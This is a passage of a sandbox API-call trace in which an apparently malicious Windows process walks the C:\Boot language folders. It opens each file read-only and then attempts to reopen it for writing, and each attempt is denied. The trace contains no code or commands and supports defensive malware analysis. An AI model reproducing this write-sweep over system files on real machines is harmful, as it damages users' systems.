lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc4938cb0, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0070.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0070.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0070.592] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.592] FindFirstFileExW (in: lpFileName="C:\\Boot\\ru-RU\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0070.694] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef698608, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.694] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4938cb0, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x466d8 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.694] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.694] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.694] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.695] AreFileApisANSI () returned 1 [0070.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.695] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0070.695] AreFileApisANSI () returned 1 [0070.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.695] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0070.695] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.695] GetFileType (hFile=0x41c) returned 0x1 [0070.695] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.696] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.696] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.696] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.696] CloseHandle (hObject=0x41c) returned 1 [0070.696] AreFileApisANSI () returned 1 [0070.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.696] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0070.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned 30 [0070.696] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.696] GetLastError () returned 0x5 [0070.696] GetLastError () returned 0x5 [0070.696] SetLastError (dwErrCode=0x5) [0070.696] GetLastError () returned 0x5 [0070.697] SetLastError (dwErrCode=0x5) [0070.697] GetLastError () returned 0x5 [0070.697] SetLastError (dwErrCode=0x5) [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.697] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.697] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4938cb0, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef698608, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xafa0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.697] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0070.697] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0070.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.698] AreFileApisANSI () returned 1 [0070.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\ru-RU\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\ru-RU\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.698] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0070.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.698] AreFileApisANSI () returned 1 [0070.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.698] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x538c8 [0070.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 30 [0070.698] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.698] GetFileType (hFile=0x41c) returned 0x1 [0070.698] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.699] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.699] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.699] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.699] CloseHandle (hObject=0x41c) returned 1 [0070.699] AreFileApisANSI () returned 1 [0070.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.699] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0070.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\ru-RU\\memtest.exe.mui") returned 30 [0070.699] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\memtest.exe.mui" (normalized: "c:\\boot\\ru-ru\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.699] GetLastError () returned 0x5 [0070.699] GetLastError () returned 0x5 [0070.700] SetLastError (dwErrCode=0x5) [0070.700] GetLastError () returned 0x5 [0070.700] SetLastError (dwErrCode=0x5) [0070.700] GetLastError () returned 0x5 [0070.700] SetLastError (dwErrCode=0x5) [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.700] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.700] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓꾠")) returned 0 [0070.700] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0070.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0070.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0070.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0070.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.700] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.700] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0070.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0070.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.701] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0070.701] AreFileApisANSI () returned 1 [0070.701] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\sk-SK", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\sk-SK", lpUsedDefaultChar=0x0) returned 14 [0070.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.701] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0070.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0070.701] AreFileApisANSI () returned 1 [0070.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.701] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0070.701] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sk-SK") returned 14 [0070.701] CreateFileW (lpFileName="C:\\Boot\\sk-SK" (normalized: "c:\\boot\\sk-sk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.701] GetLastError () returned 0x5 [0070.701] GetLastError () returned 0x5 [0070.701] SetLastError (dwErrCode=0x5) [0070.701] GetLastError () returned 0x5 [0070.701] SetLastError (dwErrCode=0x5) [0070.701] GetLastError () returned 0x5 [0070.702] SetLastError (dwErrCode=0x5) [0070.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.702] AreFileApisANSI () returned 1 [0070.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.702] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88770 [0070.702] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88770, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\sk-SK") returned 14 [0070.702] CreateFileW (lpFileName="C:\\Boot\\sk-SK" (normalized: "c:\\boot\\sk-sk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.702] GetLastError () returned 0x5 [0070.702] GetLastError () returned 0x5 [0070.702] SetLastError (dwErrCode=0x5) [0070.702] GetLastError () returned 0x5 [0070.702] SetLastError (dwErrCode=0x5) [0070.702] GetLastError () returned 0x5 [0070.702] SetLastError (dwErrCode=0x5) [0070.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0070.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0070.702] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, 